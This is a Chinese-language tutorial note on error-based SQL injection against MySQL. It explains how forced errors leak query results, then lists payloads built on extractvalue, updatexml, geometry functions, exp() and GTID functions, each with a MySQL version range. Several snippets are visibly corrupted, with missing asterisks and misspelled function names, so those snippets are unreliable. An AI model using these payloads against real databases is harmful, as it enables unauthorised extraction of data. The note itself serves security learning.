🏆今日学习目标：
🍀学会报错注入
✅创作者：贤鱼

原理

利用数据库某些机制，人为制造错误，使得查询的结果出现在报错中
sql查询的星系会被报错语句返回到界面上

注入

extractvalue

extractvale(MXL_document,xpath_string);

第一个参数为xml字符串
第二个参数为xpath格式字符串

作用，从xml中返回包含查询字符串

==注意！== 查询时用group_concat或者limit
记得用substr函数进行截取，extractvalue报错信息最多32个字符

后面的程序和上文union注入差不多，如有需要可以查看

双查询注入

上文所说查询时用group_concat或者limit
有些版本的mysql中query不能用聚合函数，面对这种情况，我们只能从口袋里掏出limit

用limit将结果一行一行爆出

双列名查询

join：
用于将两个表连接

在sql查询时，如果查询的两个列名是一样的就会报错，我们可以利用这个机制注入

报错函数

extractvalue(XML_document,XPath_string);

xml这两个函数报错时，会忽略掉第一个字符若，其后字符
与它连续且相同，也会被忽略 第一个参数：XML_document
是String格式，为XML文档对象的名称，文中为Doc 第二个
参数：XPath_string (Xpath格式的字符串). 作用：从目标
XML中返回包含所查询值的字符串 （ >=5.1.5）
updatexml(1,concat(0x282b,(QUERY),0x292b),1)

updatexml(XML_document,XPath_string, new_value);

第一个参数：XML_document是String格式，为XML文档对
象的名称，文中为Doc 第二个参数：XPath_string (Xpath格
式的字符串)。 第三个参数：new_value，String格式，替换
查找到的符合条件的数据 （ >=5.1.5）
extractvalue(1,concat(0x282b,(QUERY),0x292b))

geometrycollection()

geometrycollection((select from(select from(select
user())a)b));（5.1>=version<=5.5.48 ）

multipoint()

multipoint((select * from(select user())b));
（5.1>=version<=5.5.48 ）

polygon()

select polygon((select from(select from(select
user())a)b));（5.1>=version<=5.5.48 ）

multipolygon()

multipolygon((select from(select from(select
user())a)b));（5.1>=version<=5.5.48 ）

linestring()

linestring((select from(select from(select user())a)b));
（5.1>=version<=5.5.48 ）

multilinestring()

multilinestring((select from(select from(select
user())a)b));（5.1>=version<=5.5.48 ）

exp()

exp(~(select * from(select user())a));
（5.1>=version<=5.5.48 ）

ST_LatFromGeoHash()

select ST_LatFromGeoHash(user());（>=5.7）

ST_LongFromGeoHash()

select ST_LongFromGeoHash(user());（*>=5.7）

GTID_SUBSET()

select GTID_SUBSET(user(),1);（*>=5.7）

GTID_SUBTRACT()

select GTID_SUBTRACT(user(),1);（*>=5.7）

ST_PointFromGeoHash()

select ST_PointFromGeoHash(user(),1);（*>=5.7）

procedure analyse()

procedure
analyse(extractvalue(1,concat(0x3a,user())),1)； 放在语句
末尾，（*<=5.6.17）